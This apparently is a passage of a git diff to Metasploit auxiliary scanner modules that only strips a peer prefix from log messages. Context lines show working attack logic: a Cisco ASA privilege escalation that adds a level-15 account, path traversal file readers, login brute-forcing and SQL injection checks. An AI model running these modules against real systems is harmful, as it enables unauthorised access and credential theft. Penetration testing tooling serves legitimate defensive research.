password:#{pass.inspect} and group:#{group.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") begin cookie = "webvpn=; " + @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary resp.body.match(/SSL VPN Service/) && resp.body.match(/webvpn_logout/i) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") do_logout(resp.get_cookies) @@ -230,7 +230,7 @@ class Metasploit3 < Msf::Auxiliary return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") end rescue ::Rex::ConnectionRefused, @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end end diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb index acb1737c39..513c8217b1 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) - vprint_good("#{peer} - Server is responsive") + vprint_good("Server is responsive") rescue ::Rex::ConnectionError, ::Errno::EPIPE return false end @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 - vprint_good("#{peer} - Logged out") + vprint_good("Logged out") end end @@ -117,8 +117,8 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('Cisco Adaptive Security Appliance Software Version') return resp.body else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == 2 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == 2 end end @@ -130,18 +130,18 @@ class Metasploit3 < Msf::Auxiliary password = Rex::Text.rand_text_alphanumeric(20) tries.times do |i| - vprint_good("#{peer} - Attemping to add User: #{username}, Pass: #{password}") + vprint_good("Attemping to add User: #{username}, Pass: #{password}") command = "username #{username} password #{password} privilege 15" resp = run_command(command, cookie) if resp && !resp.body.include?('Command authorization failed') && !resp.body.include?('Command failed') - vprint_good("#{peer} - Privilege Escalation Appeared Successful") + vprint_good("Privilege Escalation Appeared Successful") return [username, password] else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == tries - 1 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == tries - 1 end end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('SSL VPN Service') && resp.body.include?('webvpn_logout') - vprint_good("#{peer} - Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") + vprint_good("Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") return resp.get_cookies else return false @@ -195,7 +195,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) # Validate we're dealing with Cisco SSL VPN unless validate_cisco_ssl_vpn - vprint_error("#{peer} - Does not appear to be Cisco SSL VPN") + vprint_error("Does not appear to be Cisco SSL VPN") return end @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary # interimittent based on session, so we'll just retry # 'X' times. datastore['RETRIES'].times do |i| - vprint_good("#{peer} - Exploit Attempt ##{i}") + vprint_good("Exploit Attempt ##{i}") # Authenticate to SSL VPN and get session cookie cookie = do_login( @@ -214,7 +214,7 @@ class Metasploit3 < Msf::Auxiliary # See if our authentication attempt failed unless cookie - vprint_error("#{peer} - Failed to login to Cisco SSL VPN") + vprint_error("Failed to login to Cisco SSL VPN") next end @@ -223,10 +223,10 @@ class Metasploit3 < Msf::Auxiliary if version && version_match = version.match(/Cisco Adaptive Security Appliance Software Version ([\d+\.\(\)]+)/) - print_good("#{peer} - Show version succeeded. Version is Cisco ASA #{version_match[1]}") + print_good("Show version succeeded. Version is Cisco ASA #{version_match[1]}") else do_logout(cookie) - vprint_error("#{peer} - Show version failed") + vprint_error("Show version failed") next end @@ -235,11 +235,11 @@ class Metasploit3 < Msf::Auxiliary do_logout(cookie) if creds - print_good("#{peer} - Successfully added level 15 account #{creds.join(", ")}") + print_good("Successfully added level 15 account #{creds.join(", ")}") user, pass = creds report_escalated_creds(user, pass) else - vprint_error("#{peer} - Failed to created user account on Cisco SSL VPN") + vprint_error("Failed to created user account on Cisco SSL VPN") end end end diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index a351f737aa..3878ced5cd 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] f = datastore['FILE'] @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.body =~ /^Fatal error\:/ - print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:") + print_error("Unable to read '#{datastore['FILE']}', possibily because:") print_error("\t1. File does not exist.") print_error("\t2. No permission.") print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.") @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index 8acee32259..a121331058 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -90,11 +90,11 @@ class Metasploit3 < Msf::Auxiliary # sid, token = get_sid_token if sid.nil? or token.nil? - vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue") + vprint_error("Unable to obtain session ID or token, cannot continue") return :abort else - vprint_status("#{peer} - Using sessiond ID: #{sid}") - vprint_status("#{peer} - Using token: #{token}") + vprint_status("Using sessiond ID: #{sid}") + vprint_status("Using token: #{token}") end begin @@ -114,22 +114,22 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return :abort end location = res.headers['Location'] if res and res.headers and (location = res.headers['Location']) and location =~ /admin\// - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.headers['Location']) return :next_user else - vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"") + vprint_error("Bad login: \"#{user}:#{pass}\"") return end end @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying \"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index 56412ba3f2..04d650de51 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if res.body.include?('Access denied') # This probably means the Views Module actually isn't installed - print_error("#{peer} - Access denied") + print_error("Access denied") return Exploit::CheckCode::Safe elsif res.message != 'OK' || res.body != '[ ]' return Exploit::CheckCode::Safe @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary results << user_list.flatten.uniq end else - print_error("#{peer} - Unexpected results from server") + print_error("Unexpected results from server") return end end diff --git a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb index a521f753cf..58be3c1b0c 100644 --- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb +++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << payload.gsub('/', '%2f') travs << file.gsub('/', '%2f') - vprint_status("#{peer} - Retrieving file contents...") + vprint_status("Retrieving file contents...") res = send_request_raw( 'method' => 'GET', @@ -89,10 +89,10 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Checking if it's a vulnerable ElasticSearch") + vprint_status("Checking if it's a vulnerable ElasticSearch") check_code = check_host(ip) - print_status("#{peer} - #{check_code.second}") + print_status("#{check_code.second}") if check_host(ip) != Exploit::CheckCode::Appears return end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary contents = read_file(filename) unless contents - print_error("#{peer} - No file downloaded") + print_error("No file downloaded") return end @@ -123,6 +123,6 @@ class Metasploit3 < Msf::Auxiliary fcontent, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index 9da9bffde7..eccfdbc20d 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end @@ -53,15 +53,15 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) - vprint_good("#{peer} - Running EtherPAD Duo application ...") + vprint_good("Running EtherPAD Duo application ...") return true else - vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") + vprint_error("Application is not EtherPAD Duo. Module will not continue.") return false end end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( @@ -108,16 +108,16 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user, pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD") - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 402c7dbdde..3bb9ab7c3b 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -42,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT']) return true if res rescue ::Rex::ConnectionRefused - vprint_status("#{peer} - Connection refused") + vprint_status("Connection refused") return false rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return false rescue ::OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL/TLS connection error") + vprint_error("SSL/TLS connection error") return false end end @@ -61,19 +61,19 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIP management interface if res.body =~ /<title>BIG\-IP/ - print_good("#{peer} - F5 BigIP web management interface found") + print_good("F5 BigIP web management interface found") return end # Detect EM management interface if res.body =~ /<title>Enterprise Manager/ - print_good("#{peer} - F5 Enterprise Manager web management interface found") + print_good("F5 Enterprise Manager web management interface found") return end # Detect ARX management interface if res.body =~ /<title>F5 ARX Manager Login<\/title>/ - print_good("#{peer} - ARX web management interface found") + print_good("ARX web management interface found") return end end @@ -81,14 +81,14 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIQ management interface res = send_request_raw('method' => 'GET', 'uri' => '/ui/login/') if res && res.code == 200 && res.body =~ /<title>BIG\-IQ/ - print_good("#{peer} - F5 BigIQ web management interface found") + print_good("F5 BigIQ web management interface found") return end # Detect FirePass management interface res = send_request_raw('method' => 'GET', 'uri' => '/admin/', 'rport' => rport) if res && res.code == 200 && res.body =~ /<br><br><br><big><b> FirePass/ - print_good("#{peer} - F5 FirePass web management interface found") + print_good("F5 FirePass web management interface found") return end end diff --git a/modules/auxiliary/scanner/http/gitlab_login.rb b/modules/auxiliary/scanner/http/gitlab_login.rb index 6217518937..46df091403 100644 --- a/modules/auxiliary/scanner/http/gitlab_login.rb +++ b/modules/auxiliary/scanner/http/gitlab_login.rb @@ -47,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary ) if res && res.body && res.body.include?('user[email]') - vprint_status("#{peer} - GitLab v5 login page") + vprint_status("GitLab v5 login page") elsif res && res.body && res.body.include?('user[login]') - vprint_status("#{peer} - GitLab v7 login page") + vprint_status("GitLab v7 login page") else vprint_error('Not a valid GitLab login page') return diff --git a/modules/auxiliary/scanner/http/goahead_traversal.rb b/modules/auxiliary/scanner/http/goahead_traversal.rb index 0dd40c9e34..2fa77e2376 100644 --- a/modules/auxiliary/scanner/http/goahead_traversal.rb +++ b/modules/auxiliary/scanner/http/goahead_traversal.rb @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb index ec3c90c5c6..c4dbf3e12f 100644 --- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb +++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb @@ -63,11 +63,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_imc_som? - vprint_error("#{peer} - HP iMC with the SOM component not found") + vprint_error("HP iMC with the SOM component not found") return end - vprint_status("#{peer} - Sending request...") + vprint_status("Sending request...") res = send_request_cgi({ 'uri' => normalize_uri("servicedesk", "servicedesk", "fileDownload"), 'method' => 'GET', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary contents, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Failed to retrieve file") + vprint_error("Failed to retrieve file") return end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb index fa4557f956..39ff1efbeb 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb @@ -50,14 +50,14 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") res = send_request_cgi({ 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -65,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary end def accessfile - print_status("#{peer} - Retrieving the target hostname") + print_status("Retrieving the target hostname") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -107,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary end if not host_name or host_name.empty? - print_error("#{peer} - Failed to retrieve the host name") + print_error("Failed to retrieve the host name") return end - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -152,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end @@ -160,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end @@ -168,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index e60872481f..028e951d5c 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') @@ -60,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -84,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" - print_status("#{peer} - Retrieving the SiteScope Configuration") + print_status("Retrieving the SiteScope Configuration") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') @@ -103,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end @@ -111,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end @@ -119,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") - print_status("#{peer} - HP SiteScope Configuration saved in #{path}") - print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data") + print_status("HP SiteScope Configuration saved in #{path}") + print_status("HP SiteScope Configuration is saved as Java serialization data") return end - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index db77012186..5d060660b9 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -50,7 +50,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APIMonitorImpl') @@ -59,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" + "\r\n" - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") uri = normalize_uri(@uri, 'services/APIMonitorImpl') @@ -104,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m loot = CGI.unescapeHTML($1) if not loot or loot.empty? - print_status("#{peer} - Retrieved empty file") + print_status("Retrieved empty file") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") end end diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb index 4862e49216..20cceac73b 100644 --- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb +++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb @@ -173,15 +173,15 @@ class Metasploit3 < Msf::Auxiliary version = get_version(res) unless version.blank? - print_status("#{peer} - Version detected: #{version}") + print_status("Version detected: #{version}") unless is_version_tested?(version) - print_warning("#{peer} - You're running the module against a version we have not tested") + print_warning("You're running the module against a version we have not tested") end end sys_name = get_system_name(res) unless sys_name.blank? - print_status("#{peer} - System name detected: #{sys_name}") + print_status("System name detected: #{sys_name}") report_note( :host => ip, :type => "system.name", @@ -190,7 +190,7 @@ class Metasploit3 < Msf::Auxiliary end if anonymous_access?(res) - print_good("#{peer} - No login necessary. Server allows anonymous access.") + print_good("No login necessary. Server allows anonymous access.") return end diff --git a/modules/auxiliary/scanner/http/influxdb_enum.rb b/modules/auxiliary/scanner/http/influxdb_enum.rb index 4e13b6ad46..a4b17dcea8 100644 --- a/modules/auxiliary/scanner/http/influxdb_enum.rb +++ b/modules/auxiliary/scanner/http/influxdb_enum.rb @@ -41,29 +41,29 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) rescue ::Errno::EPIPE, ::Timeout::Error, ::EOFError, ::IOError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end unless res - print_error("#{peer} - Server did not respond in an expected way.") + print_error("Server did not respond in an expected way.") return end if res.code == 401 && res.body =~ /Invalid username\/password/ - print_error("#{peer} - Failed to authenticate. Invalid username/password.") + print_error("Failed to authenticate. Invalid username/password.") return elsif res.code == 200 && res.headers.include?('X-Influxdb-Version') && res.body.length > 0 - print_status("#{peer} - Enumerating...") + print_status("Enumerating...") begin temp = JSON.parse(res.body) if temp.blank? - print_status("#{peer} - Json data is empty") + print_status("Json data is empty") return end results = JSON.pretty_generate(temp) rescue JSON::ParserError - print_error("#{peer} - Unable to parse JSON data.") + print_error("Unable to parse JSON data.") return end print_good("Found:\n\n#{results}\n") @@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary results, 'InfluxDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 8a5a866338..7bd5df2dad 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -43,17 +43,17 @@ class Metasploit3 < Msf::Auxiliary }) unless res - vprint_error("#{peer} - No response received") + vprint_error("No response received") return end unless res.headers.include?('X-Jenkins') - vprint_error("#{peer} - responded with #{res.code} but does not seem to be Jenkins") + vprint_error("responded with #{res.code} but does not seem to be Jenkins") return end version = res.headers['X-Jenkins'] - print_status("#{peer} - Jenkins Version - #{version}") + print_status("Jenkins Version - #{version}") report_service( :host => rhost, :port => rport, @@ -91,13 +91,13 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain', }) unless res - vprint_error("#{peer} - Timeout") + vprint_error("Timeout") return end case res.code when 200 - print_good("#{peer} - #{uri_path} does not require authentication (200)") + print_good("#{uri_path} does not require authentication (200)") report_note({ :type => "jenkins_path", :host => rhost, @@ -120,22 +120,22 @@ class Metasploit3 < Msf::Auxiliary ) end when 403 - print_status("#{peer} - #{uri_path} restricted (403)") + print_status("#{uri_path} restricted (403)") when 401 - print_status("#{peer} - #{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") + print_status("#{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") when 404 - print_status("#{peer} - #{uri_path} not found (404)") + print_status("#{uri_path} not found (404)") when 301 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") when 302 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") else - print_status("#{peer} - #{uri_path} Don't know how to handle response code #{res.code}") + print_status("#{uri_path} Don't know how to handle response code #{res.code}") end end def parse_system_info(body) - vprint_status("#{peer} - Getting useful information from systemInfo") + vprint_status("Getting useful information from systemInfo") infos = { "os.name" => nil, "os.version" => nil, diff --git a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb index 811261b7cc..87894f3c57 100644 --- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb @@ -68,14 +68,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") + print_good("Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb index 2ae1d62bb8..760418ed0a 100644 --- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb @@ -41,7 +41,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), @@ -85,14 +85,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") + print_good("Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb index da0562c0b6..66072a6adb 100644 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary 'htaccess.txt' ] - vprint_status("#{peer} - Checking for interesting pages") + vprint_status("Checking for interesting pages") pages.each do |page| scan_pages(tpath, page, ip) end @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary note = "Registration Page" end - print_good("#{peer} - #{note}: #{tpath}#{page}") + print_good("#{note}: #{tpath}#{page}") report_note( :host => ip, @@ -90,13 +90,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, 